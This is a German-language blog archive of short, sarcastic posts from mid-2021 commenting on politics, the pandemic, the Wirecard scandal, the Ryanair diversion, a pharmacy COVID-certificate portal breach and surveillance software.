Das gab es wohl diverse Lieferausfälle wegen Bauarbeiten und Ausfällen. Gut, das ist nicht unplausibel, denn natürlich macht man Bauarbeiten im Sommer, wenn das Gas nicht so dringend gebraucht wird wie im Winter. Allerdings:
Nach Auskunft des ukrainischen Pipelinebetreibers hat Gazprom für den August keine höheren Durchlasskapazitäten bestellt. Dies habe den Preisanstieg weiter beschleunigt. Offenbar befürchte Gazprom, dass es bei der Pipeline Nord Stream 2 doch noch Probleme geben könnte - trotz der jüngsten Einigung mit den USA.
Nord Stream 2 ist so gut wie fertig, soll bie Ende des Monats betriebsbereit sein.

Sun Aug 1 2021

[l] Von Olaf "Cum-Ex" Scholz war natürlich auch in Sachen Hochwasser nichts zu erwarten. Insofern überrascht das jetzt hier nicht groß: Scholz bringt verpflichtende Versicherung ins Gespräch. Endlich ein bisschen Kohle für die Versicherungsbranche!
Seit die SPD denen die Riester-Milliarden geschenkt hat, drohte da das Koks auszugehen!
Wie wäre es, wenn wir die Häuser nicht genau da wieder aufbauen, wo sie vom nächsten Hochwasser wieder plattgemacht werden?
Wie wäre es, wenn wir mal ein paar Flussbegradigungen zurückbauen?

Wed Jul 28 2021

[l] Julian Assange verliert seine Ecuadorianische Staatsbürgerschaft.
Bei der Verleihung der Staatsbürgerschaft Ecuadors an den Australier seien verwaltungsrechtliche Fehler gemacht worden, sagt nun ein Gericht.
Oh ACH SO ist das! Ein clerical error, ja? Softwareproblem vielleicht? Kann man nichts machen.
Das ist der Nachteil von Ländern wie Ecuador. Da kann sich die Faktenlage schonmal mit der Windrichtung ändern. Oder mit der politischen Windrichtung.

Thu Jul 22 2021

[l] Hahaha, wie geil! Apotheken können keine digitalen Covid-Zertifikate mehr ausstellen. Jemand hatte eine Sicherheitslücke in dem Portal gefunden, das die dafür verwenden. Also hat der Betreiber das Portal abgeschaltet. Ohne den Apotheken Bescheid zu geben. Die dachten erst, sie hätten irgendwas falsch gemacht und daher sei ihr Account zugemacht worden.
Das ist der Gewöhnungseffekt von Youtubes Willkürherrschaft. Jeder lebt ständig in der Furcht, ihm könnten ohne Angabe von Gründen irgendwelche Zugänge weggenommen werden. Wir leben in einer Gesellschaft der Almosenempfänger.
Jedenfalls, warum ich das hier erwähne: Die haben eine Stellungnahme veröffentlicht. Da steht das hier drin:
Das Handelsblatt hat nun mithilfe von professionell gefälschten Dokumenten einen Gastzugang für einen nicht existierenden Apothekeninhaber erzeugt. Dazu wurden eine gefälschte Betriebserlaubnis und ein gefälschter Bescheid des Nacht- und Notdienstfonds vorgelegt. Unter der gefälschten Apotheken-Identität wurden insgesamt zwei Impfzertifikate ausgestellt.
Ich bin ja nun echt kein Freund des Handelsblattes, sei die mich wegen Paperboy verklagt haben. Aber das ist ja mal echt schäbig, jetzt so zu tun, als seien die Journalisten daran Schuld, dass dieser windige Betreiberverein offensichtlich keinerlei Plausibilitätsprüfung durchgeführt hat.
Wer sich jetzt denkt: Hey, so eine Pressemitteilung kann ich nur ernst nehmen, wenn die auch noch was von krimineller Energie faseln! Für den habe ich gute Nachrichten:
Diese hat bis zum heutigen Donnerstagmittag keine Hinweise auf andere unberechtigte Zugänge ergeben, deren Erstellung in betrügerischer Absicht nur mit erheblichem Aufwand und krimineller Energie denkbar ist.
Jaja. Wie alle anderen, auch noch so primitiven Angriffe von bescheidener Spam-Ransomware war auch hier äußerste kriminelle Energie im Spiel! Die Angreifer haben erheblichen Aufwand getrieben!!1! Die haben auf einem Kopierer den Kopieren-Knopf gedrückt!!1!
Den eigentlichen Elefanten im Raum sprechen sie dabei lieber gar nicht erst an:
Daher ist davon auszugehen, dass die über 25 Millionen Impfzertifikate, die bisher über Apotheken ausgestellt worden sind, alle von rechtmäßig registrierten Apotheken ausgestellt wurden.
Ach, und damit sind die dann automatisch sauber? Ich finde ja, nur Apotheken, die keinen Esoterik- und Homöopathie-Scheiß im Angebot haben, sollten Zertifikate ausstellen dürfen.
Da muss man sich dann halt entscheiden. Entweder Wissenschaft oder halt nicht.
Heise spricht dann noch einen wunden Punkt an:
In der offiziellen Stellungnahme grenzt der DAV das Problem geschickt auf die Existenz der staatlich verordneten Gastzugänge ein. Insgesamt seien knapp 17.900 Apotheken beim Portal registriert, von denen nur 470 über den Gastzugang zugreifen. Warum der DAV den Zugang dann auch für Vereinsmitglieder sperrt, lässt der Verband offen.
Ja, äh, in der Tat. Die Antwort würde auch mich interessieren. LOL

Wed Jul 21 2021

[l] Das Bundesverfassungsgericht hat ja vor ein paar Jahren ein neues Grundrecht eingeführt. Ein Grundrecht auf Gewährleistung der Vertraulichkeit und Integrität informationstechnischer Systeme. Wikipedia dazu.
Das war 2008.
Jetzt haben sie das wieder zurückgezogen.
Jemand hat die offensichtliche Beobachtung gemacht, dass wenn die Polizei Sicherheitslücken sammeln und Trojaner installieren darf, dass dann dieses Grundrecht wertlos ist. Daraufhin hat der 1. Senat diese Verfassungsbeschwerde abgewiesen. Begründung:
Zwar besteht eine grundrechtliche Schutzpflicht; betroffen sind das Fernmeldegeheimnis und die grundrechtliche Gewährleistung der Vertraulichkeit und Integrität informationstechnischer Systeme. Dass die daraus folgende Schutzpflicht verletzt sein könnte, haben die Beschwerdeführenden jedoch nicht in der erforderlichen Weise begründet.
Ja gut, der Beschwerdeführer weist darauf hin, dass der Apfel auf den Boden fällt. Aber das heißt ja nicht, dass der Beschwerdeführer die Schwerkraft ausreichend begründet hat!1!!
Die Beschwerdeführenden haben nicht hinreichend dargelegt, dass diese grundrechtliche Schutzpflicht verletzt sein könnte.
Nee, natürlich nicht! Seit wann gefährdet das die Vertraulichkeit oder Integrität von IT-Systemen, wenn jemand Sicherheitslücken hortet und Trojaner installiert?!
Und puff ist es weg, das neue Grundrecht. Verbrannte Erde. Sieht aus wie wenn die Nato aus Flugzeugen Demokratie abgeworfen hat. Ein rauchender Krater.

Tue Jul 20 2021

[l] Wie schlimm ist die Lage im Pharmasektor? So schlimm:
Time to assume that health research is fraudulent until proven otherwise?
Fragt der ehemalige Chefredakteur des BMJ (British Medical Journal).
Oh und mit fraudulent meint er nicht, dass jemand bei p-Hacking oder schlechte Statistik gemacht hat. Nein. Damit meint er, dass jemand sagt, er habe eine Studie gemacht, aber hat er gar nicht.
So schlimm ist die Lage.

Wed Jul 14 2021

[l] Was glaubt ihr ist die Erkenntnis der Politik zum Wirecard-Skandal?
1. Schauen, wieso die Bafin so versagt hat
2. Hey, wieso hat eigentlich die Bafin so krass verkackt?
3. Wie ist es mit der Regulierung der Wirtschaftsprüfer? Wieso hat die eigentlich so krass verkackt?
4. Sag mal, die Bafin wäre doch eigentlich dafür zuständig gewesen, sowas wie Wirecard zu verhindern. Wieso haben sie das eigentlich nicht getan?
5. Wieso hat eigentlich die deutsche Politik in Europa Einfluss für Wirecard ausgeübt? Da müssten doch eigentlich mehrere Köpfe gerollt sein. Welche sind gerollt? Wie? Keine? Warum nicht?
6. Wieso haben wir eigentlich so viel Zeit, Geld und Personal für die Verfolgung von Kinderpornographie und Linksterrorismus, während dann Cum Ex und Wirecard derartige Schäden anrichten können?
7. Sag mal, gab es da nicht ein paar Geheimdienst-Connections? Da könnte man doch auch mal ein paar Leute feuern!
8. Wir sollten mal gucken, wieso die Bafin so vollständig verkackt hat.
9. Die Regulierung der Wirtschaftsprüfer muss auch mal entkernt und neu gemacht werden.
10. ... Telegram!1!!
Ihr werdet schon ahnen, welchen Weg die Politik geht. Mit Händen und Füßen und größtem Druck haben sie nach etwas gesucht, wohin sie jetzt die Aufmerksamkeit ablenken können, und woran dann nicht sie Schuld wären. Das ist gar nicht so einfach, denn es gibt da ja mehrere Instanzen, die Wirecard hätten verhindern sollen, und auf allen Ebenen gab es systemisches Versagen der Regulatoren.
Telegram wirkt jetzt vielleicht ein bisschen weit hergeholt.
Das liegt daran, dass es weit hergeholt ist.
Was für ein peinliches Schauspiel. Eine Bankrotterklärung.

Sat Jul 10 2021

[l] Ich weiß nicht, wie euch das geht, aber ich kriege langsam Ermüdungserscheidungen in der Causa Baerbock.
Das blubbert immer noch! Jetzt im Fokus: Baerbocks Promotionsstipendium von der Heinrich-Böll-Stiftung. Das ist die "parteinahe Stiftung" der Grünen. Woher haben die ihr Geld? Na wie alle parteinahen Stiftungen. Vom Steuerzahler!
Die Parteien haben das System so hergerichtet, dass sie diese Stiftungen haben, die Geld vom Steuerzahler kriegen, und damit im Wesentlichen nach Belieben Dinge tun, um die Macht der jeweiligen Partei zu erhalten. In diesem Fall: Stipendien an potentiellen Nachwuchs vergeben.
Das ist natürlich ein Riesenskandal. Wie? Nein, nicht die Baerbock. Dass es diese Stiftungen überhaupt gibt. Natürlich kriegen die Grünen dann auch eine, und natürlich macht die dann genau dasselbe, was die anderen Parteien auch machen.
Ich bin mir sicher, dass die anderen Parteien auch lauter Nepotismus-Stipendien vergeben haben, an Leute, die dann "Parteiarbeit" gemacht haben, bezahlt per Stipendium vom Steuerzahler. Die dann auch nie abgeschlossen haben, oder mit einer lächerlichen Bruchpiloten-Arbeit am Ende.
Der eigentliche Skandal hier ist nicht, dass die Grünen das auch machen. Sondern dass die Parteien hier Steuergelder für ihre persönliche Bereicherung und Nepotismus verplempern dürfen, während andere Leute kein Stipendium kriegen und sich alleine durchschlagen müssen. Wer weiß, vielleicht wären im Steuersäckel genug Millionen übrig gewesen für ein ordentliches Stipendiatsprogramm, wenn die Kohle nicht über die Stiftungen in Korruption geflossen wäre.
Wobei geflossen das falsche Wort ist. Das klingt als sei an dem Fluss irgendwas natürlich. Abgesaugt sollte man vielleicht sagen. Wie so ein Benzindieb, der per Schlauch Benzin aus anderer Leute Tanks saugt.

Thu Jul 8 2021

[l] Die SZ hat eine tolle Grafik zu den Versprechen der Parteien gemacht. Konkret: Was die für Steueränderungen vorschlagen, und wie sich das auf die Ungleichverteilung in der Gesellschaft auswirken würde.
Leider haben sie das hinter einer Paywall (das hier wäre glaube ich der Link gewesen), und so muss ich stattdessen auf einen Screenshot verlinken, der auf Twitter herumgeht.
Wir erinnern uns: Die Verbrecherpartei mit der schwarzen Null sind angeblich die, die sich mit Wirtschaft auskennen. Die verteilen erst das Vermögen von den Armen und der Staatskasse zu den Reichen um, und dann sagen sie, wir müssen eine schwarze Null erreichen und daher staatliche Leistungen einsparen. Damit nehmen sie also doppelt den Armen weg.
Hey, die willst du doch wählen!!1!
Update: Hier zitiert jemand umfänglich aus dem SZ-Paywall-Artikel. Money Quote (zu Laschet):
Seine penetrante "Leistung muss sich lohnen"-Rhetorik kennt man sonst nur von der FDP. Laschets größte Angst scheint zu sein, nicht Kanzler zu werden, weil die FDP stark genug werden könnte, um eine Regierung mit Grünen und SPD zu bilden. Also will er der FDP die Wähler abjagen, indem er selbst ein FDP-Programm vorschlägt.
HARR

Fri Jul 2 2021

[l] Gute Nachrichten!
Microsoft hat bei Windows 11 große Fortschritte gemacht!
Der Blue Screen of Death ist endlich überwunden! Nach all den Jahren!
Microsoft’s Blue Screen of Death is changing to black in Windows 11
Irgendwo muss man ja anfangen *hust*

Wed Jun 30 2021

[l] Gute Nachrichten! Innovation ist doch noch nicht tot.
Hier ist zum Beispiel eine bahnbrechende: Die Telekom und Samsung wollen ein Handy bauen, bei dem man den Akku wechseln kann.
Heilige Lithiumionenbatterie, Batman! Das geht? Warum haben wir das denn nicht schon früher gemacht!1!!
[l] Interessanter SZ-Kommentar zum Konflikt zwischen Bundesverfassungsgericht und EuGH. Da gab es ja neulich ein Urteil des Verfassungsgerichtes über die Europäische Zentralbank, die direkt dem EuGH widersprach.
Die Sache sah erstmal relativ klar aus. Die EU-Kommission ist die Exekutive der EU und besteht aus Kommissaren, die von den einzelnen Mitgliedsländern geschickt werden. Die haben u.a. die Aufgabe, die Einhaltung des Europarechts in den einzelnen Ländern zu prüfen und im Zweifelsfall Klage vor dem EuGH zu erheben. Das haben sie auch direkt gemacht in diesem Fall.
Eigentlich sind sich auch alle einig, was jetzt passiert: Der EuGH wird wahrscheinlich gegen Deutschland urteilen.
Aber ganz so einfach ist es denn doch nicht.
Im Luxemburger Gerichtshof herrscht seit Langem eine Zentralisierungsdrift. Der EuGH baut seine eigene Position stetig aus. Jüngstes Beispiel ist die Rechtsstaatskontrolle gegenüber Polen und Ungarn. Dafür bekommt der EuGH viel Applaus, in dem freilich untergeht, dass der Gerichtshof hier eine Kompetenz kreiert hat, die davor nicht existierte; die Justiz ist nicht vergemeinschaftet. Voßkuhle nannte dies einen "Husarenstreich".
Das ist eigentlich immer schlecht, wenn sich jemand selbst mehr Kompetenzen geben kann. Dazu kommt, dass der EuGH sehr befangen aussieht, nicht nur in diesem Konflikt jetzt. Eigentlich sollte der EuGH ja auch EU-Organe zurückpfeifen, wenn die Mist machen. Bisher hat er aber praktisch ausschließlich pro EU geurteilt.
Die EU-Kommission sagt jetzt, man müsse im Konflikt mit Deutschland hinter dem EuGH stehen, denn wie sähe das denn sonst aus, was man mit Polen und Ungarn gemacht hat.
Das Argument kann man aber auch umdrehen, und sagen: Dieser Fall mit Deutschland zeigt, dass es falsch war, was der EuGH mit Polen und Ungarn gemacht hat.

Fri Jun 25 2021

[l] Kennt ihr Presstv.com? Das ist der Internetauftritts des iranischen Staatsfernsehens. Also genau genommen der arabischsprache Teil davon.
Gucken wir doch mal, was die gerade berichten ... Oh, nanu?
THIS WEBSITE HAS BEEN SEIZED
Ja nee, klar. Das FBI und das US-Justizministerium haben die Domain beschlagnahmt.
Gut, fragt man sich schon, wieso der Iran eine .com-Domain holt und nicht eine .ir -- oh warte, sie haben auch eine .ir-Domain. Hey, war das vielleicht ein großartiger Troll des Iran? Mal gucken, wann die Amis sich öffentlich so zum Stück Brot machen?
Gut, da haben wir jetzt die Antwort.
Und wir wissen jetzt auch, ob Trump oder Biden der krassere Betonkopf-Hardliner und Kriegstreiber ist.
So, dann gucken wir doch mal, wie der Iran das schlau nutzt. Vielleicht Statements von befreundeten "Nachrichten"seiten. Russia Today könnte das z.B. für ein generisches Statement pro Pressefreiheit nutzen. Gucken wir doch mal. Oh hier, das böte sich an: Biden kritisiert die Chinesen wegen Verletzung der Pressefreiheit, weil sie in Hong Kong Apple Daily zugemacht haben. Money Quote von Biden: Journalism is not a crime! Da hätte man was schönes draus machen können!
Ah hier hat RT was.
It is, of course, deeply ironic that a country which claims to champion freedom of speech has taken these websites down. But it’s merely the latest act in a long list of crimes and acts of aggression committed against Iran by Washington dating back decades.
Hmm, na gut, jetzt nicht das flammende Pro-Iran-Plädoyer, auf das der Iran gehofft haben wird.
Irgendjemanden wird es ja wohl geben, der das für ein generisches Statement pro Pressefreiheit nutzet.
Ah ja, hier, sie haben jemanden gefunden!
Hezbollah, Iraqi anti-terror group slam US seizure of website domains tied to pro-resistance media
Nein, wirklich! Die zitieren da die Hisbollah, praktisch weltweit als Terrororganisation anerkannt.
Frage mich, wieso sie das überhaupt auf Englisch veröffentlichen.
Gut, äh. Wo waren wir? Ah, bein internationalen Zum-Stück-Brot-Machen-Wettbwerb. Es steht unentschieden, würde ich sagen. m(

Thu Jun 24 2021

[l] Der Zynismus! Atemberaubend!
Das Bundesarbeitsgericht so: Auch von Agenturen vermittelte rumänische Altenpfleger haben ein Recht auf Mindestlohn.
Da fragst du dich doch als erstes: War an dem Begriff "Mindestlohn" irgendwas missverständlich? Gab es da Potential für Verwirrung?!
Die Tagesschau so:
Die 24-Stunden-Pflege gerät ins Wanken
[...]
Kann sich das Modell halten?
Dann fragen sie eine Verdi-Sprecherin, die meint so:
"Das Modell der sogenannten 24-Stunden-Pflege", so Sylvia Bühler vom Bundesvorstand der Dienstleistungsgewerkschaft ver.di, "basiert auf systematischem Gesetzesbruch."
Ja, äh, no shit! Wenn ihr das wusstet, wieso habt ihr dann nichts gemacht?!
[l] Whoa. Das ist ja mal krass. Guckt mal diesen Gesetzentwurf an.
Ausschuss für Recht und Verbraucherschutz ...
Entwurf eines Gesetzes zur Vereinheitlichung des Stiftungsrechts ...
Da ist man versucht, das Tab zuzumachen. Betrifft mich nicht.
Wer das nicht tut und bis Seite drei durchhält, sieht dort:
„Entwurf eines Gesetzes zur Vereinheitlichung des Stiftungsrechts und zur Änderung des Infektionsschutzgesetzes“
Da hab ich mich jahrelang drüber lustig gemacht, dass die Amis so eine degenerierte Pseudodemokratie haben, dass sie in Gesetzen über A dann ihre Giftmüll-Änderungen für Gesetz B anklemmen. Bei uns, hab ich immer gesagt, wäre sowas völlig undenkbar. Wir sind hier zwar auch nur eine mittelmäßige Demokratiesimulation, aber SO TIEF würden wir nicht sinken.
Ich war mir sicher, dass wir so tief nie sinken würden!
Jetzt fragt ihr euch bestimmt, was für einen Giftmüll sie da so dringend verklappen mussten. Den hier:
(12)„ Eine aufgrund des Absatzes 8 Satz 1 oder des Absatzes 10 Satz 1 erlassene Rechtsverordnung tritt spätestens ein Jahr nach der Aufhebung der Feststellung der epidemischen Lage von nationaler Tragweite durch den Deutschen Bundestag nach § 5 Absatz 1 Satz 2 außer Kraft. Bis zu ihrem Außerkrafttreten kann eine aufgrund des Absatzes 8 Satz 1 oder des Absatzes 10 Satz 1 erlassene Rechtsverordnung auch nach Aufhebung der epidemischen Lage von nationaler Tragweite geändert werden.“
Es ging also um die Frage, ob mit Ablauf der Bundesnotbremse auch automatisch die ganzen Grundrechtsverletzungen der Länder außer Kraft treten. Wie man ja annehmen würde. Und wie offenbar auch vor dieser Änderung der Fall war. Jetzt gelten die erstmal noch ein Jahr weiter und dürfen in diesem Jahr sogar noch geändert werden.
Für mich als juristischen Laien sieht das wie ein "die Länder dürfen jeztt ein Jahr lang machen was sie wollen"-Gesetz aus.
Update: Ein Leser erklärt:
die Änderung bezieht sich nur auf die Absätze des Infektionsschutzgesetzes zur Einreise (IFSG 36 8 und 10), d.h. für die anderen Einschränkungen gilt vermutlich das Ende der Pandemie als Ende der Einschränkungen.

Wed Jun 23 2021

[l] Der Scheuer-Andi hat bisher 5,8 Mio € für Anwälte ausgegeben. Wie? Nein, nicht er hat das bezahlt. Pfft. Der Steuerzahler hat das bezahlt!
Was die gemacht haben, die Anwälte? Na, äh, Informationsfreiheitsgesetzanfragen zu seinen ganzen zerscheuerten Projekten, äh, "beantwortet".

Mon Jun 21 2021

[l] Falls ihr euch übrigens wegen der Delta-Mutante keine Sorgen macht: Solltet ihr.
Rückblickend war das sehr freundlich von der Natur, uns erstmal die Softball-Variante von dem Virus zu geben. So hatten wir ein ganzes Jahr, unseren Scheiß auf die Reihe zu kriegen.
Nicht dass uns das geholfen hätte, aber immerhin kann so niemand sagen, wir hätten keine faire Chance gehabt.
Und was machen wir? Verkacken ein Jahr lang, dann machen wir ein Politik-Superspreading-Event, eine Fußball-Meisterschaft und planen gerade die Olympischen Spiele.
Hey, eine fucking Berlinale haben wir gemacht!
Aber gegen Ferienreisende haben wir schön gehetzt. Wie? Nein, nicht gegen alle. Gegen die Unterschicht. Die Privatjet-Parallelgesellschaft hat die ganze Zeit niemand aufgehalten. Glaubt ihr nicht? Hier ein Privatjet-Anbieter:
Immer mehr Reisende nutzen Privatjets als sicheres und effizientes Transportmittel während der laufenden Pandemie COVID 19. Der private Luftfahrtsektor ist seit Beginn der Krise, Anfang 2020, um 20 Prozent gewachsen.
Dass es DA keine Revolution gab, das muss mir auch mal jemand erklären. Vermutlich hat das einfach niemand mitgekriegt außer den Superreichen. Die normalen Leute haben sich gedacht, niemand könne so ekelig sein.
Komm, liebe Rassistenparteien, erzählt mir mehr über die Leute, die ihre Verwandtschaft in der Türkei besucht haben! Was das für eine Risikogruppe ist!
Und das Tragischste? Die Hoffnungsträgerpartei, die diesen ganzen korrupten Haufen ersetzen soll? Das ist die Partei, die an Homöopathie, Geistheilung und anderen Eso-Bullshit glaubt. Da kannste dich echt nur noch in den Bunker zurückziehen. Den mit den guten Luftfiltern.

Sun Jun 20 2021

[l] Bug des Tages: Bind 9 liefert immer noch. Über Bind haben wir uns schon in den 1980er Jahren lustig gemacht.

Sat Jun 19 2021

[l] Wieviel Bayern braucht es, um die Schuldaten zu digitalisieren?
Keine Ahnung, aber sie brauchen 25 Jahre.
Wegen schwerer Fehler und Versäumnisse im Projektmanagement hätten sich die ursprünglich mit elf Millionen Euro angegebenen Kosten bis heute auf 270 Millionen vervielfacht, ohne dass die Software bis heute richtig funktioniere.
Das müsst ihr einfach jemanden machen lassen, der sich mit sowas auskennt. Dem Scheuer-Andi zum Beispiel! Wenn sich jemand mit sinnlosem Geldverbrennen auskennt, dann ja wohl der. (Danke, Maja)

Tue Jun 15 2021

[l] Wisst ihr, eine Weile lang sah das ja so aus, als seien Terroristen eigentlich fast immer männlich. Männer sind auch unter Gefängnisinsassen deutlich überrepräsentiert.
Da könnte man fast gewillt sein, Thesen von einer "toxischen Männlichkeit" nicht als sexistische Kackscheiße zu sehen!
Doch glücklicherweise rettet uns Männer der Verfassungsschutz Baden-Württemberg. Der hat nämlich eine Studie gemacht und da kommt raus, was wir eigentlich schon immer insgeheim wussten: Männer sind hier die Opfer. Männer machen bloß das, von dem sie glauben, dass es zu Sex führen könnte. Die eigentlichen Täter sind die Frauen, die sie anstacheln!!1!
Wisst ihr, ich finde ja Theorien immer besonders attraktiv, bei denen herauskommt, dass andere schuld sind.
Ich hab das ja schon immer gesagt, dass die Frauen schuld sind am Rechtsextremismus. Sagen die Rechtsextremen ja auch selber die ganze Zeit. Dass man die Grenzen schließen muss, um unsere Frauen vor den fiesen Moslems zu schützen. Äh ... Islamisten. Ach sagen wir: Ausländern!1!!
Der Bericht da findet im übrigen auch, dass die Islamisten viel schlimmer als die Nazis sind, weil die Frauen bei den Nazis mehr Rechte haben. Die dürfen da immerhin unverhüllt einkaufen gehen, bevor sie wieder an den Herd müssen!
Ich finde das ja gut, dass der Verfassungsschutz solche Forschung betreibt. Jeder Euro, den die für Genderforschung ausgeben, geht nicht in anlasslose Massenüberwachung und Repression.

Fri Jun 4 2021

[l] Der Zufluss der Leserbriefe zur TU Berlin nimmt nicht ab.
Gleich mehrere haben mir geschrieben, sie seien da mal angestellt gewesen, und die Zahlungen seien von der TU gekommen, nicht von der Landeskasse.
Die haben auch übereinstimmend berichtet, dass bei der SAP-Einführung vor Jahren (die immer noch nicht abgeschlossen ist!) ein paar Monate (!!) keine Gehälter gezahlt werden konnten. Die haben sie dann mit Zinsen irgendwann nachgezahlt, aber ich meine, äh, ... wtf?!
Ein Leser berichtete zum Verfahren der Überweisung vom Vormonat einfach nochmal abschicken:
Im Rahmen von Notfallplänen in der Industrie ist es nicht unüblich die eigene Hausbank anzuweisen die Überweisungen die mit "Gehaltszahlung" geschlüsselt wurden einfach zu wiederholen. Dieser Schlüssel ist so ziemlich der einzige der im Rahmen von SEPA Überweisungen tatsächlich genutzt wird.
Kür ist dann noch auch die Überweisung an die Sozialversicherungsträger (Krankenkassen) wiederholen zu lassen.
Ich erzähl ja gelegentlich die Story, wie ich in meinen Programmier-Anfangstagen überlegt habe, welche Art von Software ich schreiben wollen würde. Ich habe mich damals entschlossen, nie an Projekten mitzuwirken, von denen Menschenleben abhängen. Keine Medizin, keine Kraftwerke, keine Flugzeuge. Damals dachte ich noch, dass das ein klares Kriterium sei. Heute haben wir Entertainment-Systeme im Auto, über das der Rest des Autos gehackt wird.
Der Punkt jedenfalls: Ich hab dann viele Jahre später jemanden getroffen, der Software für Atomkraftwerke gehackt hat. Das war so ein hemdsärmeliger PHP-Typ (das meine ich jetzt als Gattungsbegriff, der hat nicht wirklich PHP gemacht). Sie das Modell "ach komm, wie schwer kann das sein, ich kopier einfach von dem alten Gartenbauprojekt den Code und pass hier und dort ein bisschen an".
Das ist schön und gut, wenn ich mir vornehme, keine ultrariskanten Dinge zu tun. Aber das heißt halt nicht, dass nur Leute solchen Code machen, die das können, sondern eher im Gegenteil, dass das Leute machen, die nicht begreifen, was für ein Risikofaktor sie sind.
Dass es da offenbar etablierte Verfahren gibt, um nach dem Projektverkacken einfach die Überweisungen des letzten Monats zu wiederholen, das finde ich absolut hanebüchen. Das ist ein "OMG DIE HÜTTE BRENNT, WAS MACHEN WIR JETZT"-Notfallding, das ist doch kein Plan!!
Ich bin immer wieder schockiert, wie laissez-faire Leute teilweise an Probleme rangehen. Ach komm, Atze, müssen wir nicht groß planen. Qualitätssicherung? Viel zu teuer!! Wir können ja einfach manuell überweisen!1!!

Tue Jun 1 2021

[l] Die Tagesschau interviewt den Chef der Heinrich-Böll-Stiftung-Niederlassung in Tel Aviv.
Dabei fällt dieser bemerkenswerte Satz:
Es gibt keinen regulären Haushalt, das Corona-Missmanagement ist nicht vergessen und auch nicht das Meron-Desaster, bei dem 45 Menschen getötet wurden.
Das finde ich immer wieder faszinierend, wie sich die Innen- und die Außenwahrnehmung unterscheiden können.
Aus Sicht von Europa hat Israel doch bei Covid praktisch alles richtig gemacht! Die haben Impfquoten, von denen wir nur träumen können, und sie haben sogar schon wieder normales Zivilleben aufgemacht in weiten Teilen.
Wenn DAS Mismanagement ist, was sollen WIR denn dann erst sagen?!

Mon May 31 2021

[l] Old and busted: Ryanair-Flugzeug wird von Weißrussland abgefangen, muss in der Hauptstadt notlanden, wo ein fettes Polizeiaufgebot wartet.
New hotness:
Am Flughafen BER ist am Sonntagabend eine Maschine der Ryanair außerplanmäßig gelandet. Die Polizei rückte mit einem Großaufgebot aus. Details nannte eine Sprecherin der Bundespolizei "aus einsatztaktischen Gründen" nicht.
Ich bin mir sicher, dass das überhaupt gar nicht vergleichbar ist. Ja, in beiden Fällen wurde ein überfliegendes Flugzeug (wollte von Dublin nach Krakau) zur Notlandung gezwungen. Ja, in beiden Fällen wartete fettes Polizeiaufgebot. Ja, in beiden Fällen wollte das Täter-Regime erstmal nicht sagen, was los war.
Aber es gibt auch ganz deutliche Unterschiede. Wir waren nicht so blöde und erzählten was von einer Terror-Geschichte. Wir sagen erstmal gar nichts.
Wusstet ihr eigentlich, dass Deutschland keinen europäischen Haftbefehl ausstellen darf, weil bei uns die Staatsanwaltschaften nicht unabhängig sind? Weiß auch nicht, wieso mir das gerade einfällt.
Es gibt noch einen klaren Unterschied. Wenn Weißrussland sowas macht, ist das ein Terrorregime, eine Diktatur, ein Unrechtsstaat. Wenn Deutschland sowas macht, dann war das bestimmt in Ordnung. Die Polizei hat halt ihre Arbeit gemacht. Eine lupenreine Demokratie, hier!
Höchste Zeit für ein europäisches Überflugverbot für Deutschland. Und höchste Zeit für ein paar Russland-Sanktionen!! Dieser Putin, sage ich euch!! Ganz furchtbar!!!

Thu May 27 2021

[l] Sagt mal, woher haben die Chinesen eigentlich die Software für ihren Polizeistaat?
Stellt sich raus: Von Oracle.
Bonus: Das wurde mit CIA-Geld entwickelt.
Warte mal, sagt ihr jetzt, besonders wenn ihr schon mal mit Oracle-Software gearbeitet habe. Das kommt von Oracle? Und funktioniert?!?
Keine Sorge, dafür gibt es eine einfache Erklärung:
Like the more well-known government analytics software Palantir Gotham, the software owes its rise to “war on terror” surveillance and to backing from the CIA venture capital firm In-Q-Tel. Oracle acquired Endeca in 2011.
Oracle hat da bloß ein Startup gekauft.
So und was tut diese Wundersoftware jetzt?
At the peak of the NATO protests, police reportedly used Endeca to process 20,000 tweets an hour. According to a 2012 talk given by Richard Tomlinson, who directed Endeca product management for Oracle, the tweets showed up in the software half a second after they were posted and remained there indefinitely, even if deleted.
Whoa, das ist ja unglaublich, Bob! Man kauft von Twitter einen Full Feed, und dann schreibt der das in eine Datenbank und man kann dann darin suchen!!1!
Heilige Scheiße, Bernd, das ist ja Raketentechnologie!
Ja richtig, Bob! Und wenn Sie jetzt die Nummer neben Ihrer Landesflagge anrufen, können auch Sie eine so großartiges Shellskript kaufen!!1!
They could also sort tweets by sentiment, meaning that the software would single out for scrutiny negative or angry-seeming tweets.
Na gut, ein bisschen KI macht das Ding auch. Also doch mehr als Shellskript. Auch ein bisschen Python.
Ich stell mir gerade vor, wie die CIA sich die Hände reibt, weil sie die chinesischen Polizeistaatbemühungen auf Jahrzehnte hinaus sabotieren konnten. Ich bin mir sicher: Das erste, was Oracle gemacht hat, ist die Farbpalette auf Oracle-Rot ändern. Und das zweite ist dafür zu sorgen, dass der Scheiß nur mit einer Oracle-Datenbank läuft. Und DAS haben selbst die Kommunisten nicht verdient!!1!

Wed May 26 2021

[l] Zu der Ryanair-Nummer kamen noch ein paar Leserkommentare rein.
Einer wies darauf hin, dass es 2016 einen ähnlichen Fall in die Gegenrichtung gab, da hat die Ukraine einen zivilen Passagierjet der weißrussischen Airline Belavia zur Landung genötigt, um einen gesuchten Armenier rauszuholen und verhaften zu können. Der einzige Unterschied war, dass damals das Flugzeug auch in der Ukraine losgeflogen war, und das nicht bloß ein Überflug war.
Ein anderer Leser erklärt, dass es da ein Abkommen für zivile Flieger gibt:
Zu „Übrigens, aus aktuellem Anlass: Das ehemalige Nachrichtenmagazin 2013 zur Frage, ob die Morales-Umlenkung rechtens war.“ ist anzumerken, daß man unterscheiden muß zwischen Linienflügen, wie eben Ryan-Air, und “general avaition,” also Leuten wie Morales oder Blackrock-Vorstände, die ihre Privatmaschine um die Welt gondeln.
Für erstere gilt das „Abkommen über die Internationale Zivilluftfahrt“ von 1944, insbesondere die Vereinbarung über den Transit internationaler Luftverkehrslinien, wodurch automatisch Überflugrechte eingeräumt werden müssen.
Hingegen muß die “general avaition“ jeweils Flugpläne genehmigen lassen (zur Erinnerung 2011 „Iran schickt Merkel in die Warteschleife“).
Wenn also jemand einen Linienflug der Holzbankklasse kapert verstößt er gegen das Abkommen, wenn einer einen Privatflieger mit unerwünschter Person an Bord nicht reinläßt dann nicht.
Wobei unsere amerikanischen Freunde das nie interessiert hat wenn nach ihrem Gutdünken, vgl. “Cat Stevens refused entry to US”
